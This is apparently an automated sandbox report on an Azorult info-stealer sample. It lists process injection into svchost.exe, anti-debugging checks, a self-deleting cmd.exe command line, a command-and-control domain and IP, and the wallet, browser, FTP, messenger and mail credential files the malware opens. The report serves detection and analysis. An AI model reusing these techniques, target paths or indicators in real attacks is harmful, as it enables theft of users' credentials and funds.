          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D3C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041158C FindFirstFileW,FindNextFileW,FindClose,1_2_0041158C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411590 FindFirstFileW,FindNextFileW,FindClose,1_2_00411590
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,1_2_00412D9C
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003542DE
          Source: svchost.exe, 00000001.00000002.1774849385.0000000003284000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000001.00000002.1774829394.0000000003271000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP TCPv6 Service Provider
          Source: svchost.exe, 00000001.00000002.1774770646.000000000325F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000001.00000002.1774678662.0000000003231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003CEAA2 BlockInput,0_2_003CEAA2
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00382622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00382622
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,GetCurrentProcessId,1_2_00416B94
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003542DE
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00374CE8 mov eax, dword ptr fs:[00000030h]0_2_00374CE8
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_01143510 mov eax, dword ptr fs:[00000030h]0_2_01143510
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_011434B0 mov eax, dword ptr fs:[00000030h]0_2_011434B0
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_01141E70 mov eax, dword ptr fs:[00000030h]0_2_01141E70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407A34 mov eax, dword ptr fs:[00000030h]1_2_00407A34
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003B0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_003B0B62
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00382622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00382622
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0037083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0037083F
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003709D5 SetUnhandledExceptionFilter,0_2_003709D5
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00370C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00370C21

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.2.6 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FD1008Jump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003B1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_003B1201
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00392BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00392BA5
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003BB226 SendInput,keybd_event,0_2_003BB226
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003D22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_003D22DA
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\4QihT6CwD8.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3Jump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003B0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_003B0B62
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003B1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003B1663
          Source: 4QihT6CwD8.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: 4QihT6CwD8.exeBinary or memory string: Shell_TrayWnd
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00370698 cpuid 0_2_00370698
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,1_2_00416FB8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,1_2_00404B4C
          Source: C:\Windows\SysWOW64\svchost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_003C8195
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003AD27A GetUserNameW,0_2_003AD27A
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0038BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0038BB6F
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003542DE
          Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Azorult
          Source: Yara matchFile source: 0.2.4QihT6CwD8.exe.1160000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4QihT6CwD8.exe.1160000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1775229112.0000000005E4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1775016189.0000000004D98000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1775777338.0000000006C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 4QihT6CwD8.exe PID: 4180, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5180, type: MEMORYSTR
          Yara detected Azorult Info Stealer
          Source: Yara matchFile source: 0.2.4QihT6CwD8.exe.1160000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4QihT6CwD8.exe.1160000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 4QihT6CwD8.exe PID: 4180, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5180, type: MEMORYSTR
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
          Tries to harvest and steal Bitcoin Wallet information
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\ElectrumG\wallets\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-btcp\wallets\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus Eden\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\Jump to behavior
          Tries to steal Instant Messenger accounts or passwords
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
          Source: 4QihT6CwD8.exeBinary or memory string: WIN_81
          Source: 4QihT6CwD8.exeBinary or memory string: WIN_XP
          Source: 4QihT6CwD8.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: 4QihT6CwD8.exeBinary or memory string: WIN_XPe
          Source: 4QihT6CwD8.exeBinary or memory string: WIN_VISTA
          Source: 4QihT6CwD8.exeBinary or memory string: WIN_7
          Source: 4QihT6CwD8.exeBinary or memory string: WIN_8
          Source: Yara matchFile source: 1.2.svchost.exe.6884d02.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.68195b1.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.67f75c4.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5180, type: MEMORYSTR
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003D1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_003D1204
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003D1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003D1806

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		1
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		2
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/Job2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		21
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol4
          Data from Local System          		2
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
          Valid Accounts          		2
          Obfuscated Files or Information          		2
          Credentials in Registry          		2
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Email Collection          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation          		1
          Timestomp          		1
          Credentials In Files          		147
          System Information Discovery          		Distributed Component Object Model21
          Input Capture          		112
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
          Process Injection          		1
          DLL Side-Loading          		LSA Secrets231
          Security Software Discovery          		SSH3
          Clipboard Data          		Fallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Valid Accounts          		Cached Domain Credentials1
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Virtualization/Sandbox Evasion          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
          Process Injection          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501433 Sample: 4QihT6CwD8.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 31 ln6b9.shop 2->31 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 8 other signatures 2->41 9 4QihT6CwD8.exe 4 2->9         started        signatures3 process4 signatures5 43 Binary is likely a compiled AutoIt script file 9->43 45 Found API chain indicative of sandbox detection 9->45 47 Writes to foreign memory regions 9->47 49 2 other signatures 9->49 12 svchost.exe 63 9->12         started        process6 dnsIp7 33 ln6b9.shop 104.21.2.6, 49730, 49731, 80 CLOUDFLARENETUS United States 12->33 23 C:\Users\user\AppData\...\vcruntime140.dll, PE32 12->23 dropped 25 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32 12->25 dropped 27 C:\Users\user\AppData\Local\...\softokn3.dll, PE32 12->27 dropped 29 45 other files (none is malicious) 12->29 dropped 51 System process connects to network (likely due to code injection or exploit) 12->51 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->53 55 Tries to steal Instant Messenger accounts or passwords 12->55 57 6 other signatures 12->57 17 cmd.exe 1 12->17         started        file8 signatures9 process10 process11 19 conhost.exe 17->19         started        21 timeout.exe 1 17->21         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          4QihT6CwD8.exe61%ReversingLabsWin32.Trojan.Strab
          4QihT6CwD8.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\freebl3.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\mozglue.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\msvcp140.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\nss3.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\nssdbm3.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\softokn3.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\ucrtbase.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3F5A6467\vcruntime140.dll0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
          http://ocsp.thawte.com00%URL Reputationsafe
          http://ip-api.com/json0%URL Reputationsafe
          http://www.mozilla.com00%URL Reputationsafe
          http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
          http://ln6b9.shop/LN341/index.phpAx0%Avira URL Cloudsafe
